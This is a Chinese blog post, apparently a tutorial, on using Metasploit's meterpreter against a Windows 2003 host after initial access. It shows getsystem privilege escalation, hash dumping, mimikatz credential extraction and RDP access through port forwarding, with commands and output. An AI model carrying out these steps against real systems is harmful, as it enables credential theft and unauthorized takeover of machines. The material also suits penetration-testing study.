metasploit渗透第二篇
来源:互联网 发布:python cxoracle 结果 编辑:程序博客网 时间:2024/06/05 18:29
版权声明:本文为博主原创文章,转载必须写明出处。
通过metasploit 框架反弹shell
win 2003 提权与远程连接
通过[metasploit渗透第一篇](http://blog.csdn.net/qq_38341596/article/details/78566081)我们已经获得了windows用户的普通权限,相信大家不会满足于这样,因为普通用户的权限的限制大,从现在开始我们就学习windows系统的提权,因为win 2003 ,win xp , win 7/8系统的提权方式一样,所以在这篇我就统一了。至于win10我就放在metasploit渗透第三篇。
实现步骤:
- 提权
- 获取用户的hash密码
- 对用户的hash密码解码
进行对win 2003的远程桌面连接
1. 提权
> meterpreter > getuid //获取用户的服务器运行Server username: AAA\Administrator > meterpreter >getsystem //利用已自漏洞,自动提权为SYSTEM...got system via technique 1 (Named Pipe Impersonation (InMemory/Admin)). > meterpreter > getuid ////再次查看用户Server username: NTAUTHORITY\SYSTEM
- 获取用户的hash密码
通过提权我们已经进入了对方系统的最高权限,接下来我们获取用户密码,我们使用back退出当前用户,回到meterpreter权限。
>meterpreter >Hashdump //获取密码>meterpreter >run post/windows/gather/hashdump //加载解密模块
3.对用户的hash密码解码
meterpreter > load mimikatz //加载法国神器
meterpreter >Kerberos //解密
4.对win 2003的远程桌面连接
meterpreter > portfwd add -l 8888 -r 192.168.254.101 -p 3389 //端口转发新窗口打开》》meterpreter >rdesktop -a 32 127.0.0.1:8888 -u Administrator -p 123456 meterpreter >rdesktop 192.168.0.128 -u administrator -p 123456 //进入kali的远程桌面
metasploit渗透第二篇
阅读全文
0 0
- metasploit渗透第二篇
- metasploit渗透第三篇
- Metasploit-MSSQL渗透-实战篇
- Metasploit渗透
- metasploit 渗透测试笔记(meterpreter篇)
- metasploit 渗透测试笔记(meterpreter篇)
- Metasploit 渗透测试笔记(Meterpreter篇)
- metasploit 渗透测试笔记(meterpreter篇)
- metasploit 渗透测试笔记(基础篇)
- metasploit渗透测试笔记(内网渗透篇)
- metasploit渗透测试笔记(内网渗透篇)
- metasploit渗透测试笔记(内网渗透篇)
- metasploit渗透测试笔记(内网渗透篇)
- metasploit渗透测试笔记(内网渗透篇)
- Metasploit渗透工具介绍
- Metasploit渗透测试指南
- metasploit常用渗透命令
- Metasploit portfwd跳板渗透
- 自动转换金额
- 密码是6-16位字母加数字的正则表达式和验证手机号码的正则表达式
- java学习图谱
- thymeleaf 学习笔记
- dubbo源码解析-集群容错架构设计
- metasploit渗透第二篇
- opencv for python(3) 用opencv作图,直线,圆,填充字
- LeetCode——Reverse Linked List
- Transaction check error:
- 解锁VMware pro 14 Mac Os X 13 安装选项下载
- hdu 4101 bfs+博弈
- 每天学算法
- Mac 使用SCP 上传和下载文件
- Maven简介